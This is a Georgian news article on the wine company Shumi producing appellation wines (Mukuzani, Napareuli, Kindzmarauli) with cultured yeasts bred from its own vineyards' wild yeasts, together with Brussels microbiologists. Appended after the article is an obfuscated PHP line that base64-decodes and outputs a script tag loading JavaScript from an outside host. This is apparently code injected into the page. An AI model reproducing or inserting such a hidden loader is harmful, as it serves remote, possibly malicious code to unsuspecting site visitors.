celsiusi
ავერსი საქკაბელი
საქართველოში პირველად დამზადდება ადგილწარმოშობის დასახელების კლასიკური ღვინოები, რომელთა ინდივიდუალური ხასიათი მაქსიმალურად იქნება გამოვლენილი საკუთარ კულტურულ საფუარზე დაყენების გზით. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს ღვინის ეროვნული სააგენტოდან აცნობეს.  
 
მათივე ცნობით, აღნიშნული იდეა რამდენიმე წელია ექსპერიმენტის სახით  ხორციელდება ღვინის კომპანიაში „შუმი“, ბრიუსელის თავისუფალი უნივერსიტეტის მიკრობიოლოგებთან თანამშრომლობით; მიღებული საუკეთესო შედეგების გამო კი, მიმდინარე სეზონზე   კომპანიამ მისი დანერგვა საწარმოო მასშტაბითაც  დაიწყო.
 
„შუმს“ თავის საკუთრებაში აქვს ათასეულობით წლის ისტორიის მქონე, ველური ბუნების გარემოცვაში მყოფი ადგილები: მუკუზანში - „ნადარბაზევი“, ნაფარეულში - „დიდყურე“, ქინძმარაულში - „წყარო ძველ კაკალთან“. ისინი გამორჩეულია თავისი ადგილმდებარეობით და საუკეთესო ხარისხის ნედლეულს იძლევა. ასეთი უნიკალური ვენახების ხასიათის ღვინოში სრულად გადმოსაცემად ამ ადგილებში მოწეული საფერავის ველური საფუარებისგან კომპანიამ, ბელგიელ კოლეგებთან ერთად,  შესაბამისი კულტურული შტამები გამოიყვანა; მათი გამოყენებით  კი წელს  უკვე შესაბამისი ადგილწარმოშობის  ღვინოებსაც ამზადებს. შესაბამისად, „შუმის“ 2022 წლის მოსავლის “მუკუზანი“,  „ნაფარეული“ და „ქინძმარაული“ ამ კულტურული საფუარებით იქნება დამზადებული. 
 
პარალელურად, სხვადასხვა პროფილის მეცნიერთა ჩართულობით,   მიმდინარეობს ამ გზით დაყენებული ღვინოების დინამიკის კვლევა ნედლეულიდან მზა პროდუქციამდე; მათი ტექნოლოგიური და ბიოქიმიური თვისებების, მათ შორის, ანტიოქსიდანტური აქტივობის შედარება სხვადასხვა კომერციული საფუარით დამზადებულ, იმავე ადგილწარმოშობის ღვინოებთან.
 
საკუთარ კულტურულ საფუარზე დაყენებული ღვინის წარმოება დღეისათვის არის ახალი, უმნიშვნელოვანესი მეცნიერულ-პრაქტიკული სიტყვა  ქართულ მეღვინეობაში  - ამ გზით შესაძლებლობა იქმნება, სრულფასოვნად გამოვლინდეს მიკროფლორით განპირობებული, ღვინის ქიმიურ-ორგანოლეპტიკური თავისებურებები და  მისი სრულიად ინდივიდუალური ხასიათი.  
 
 
764
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");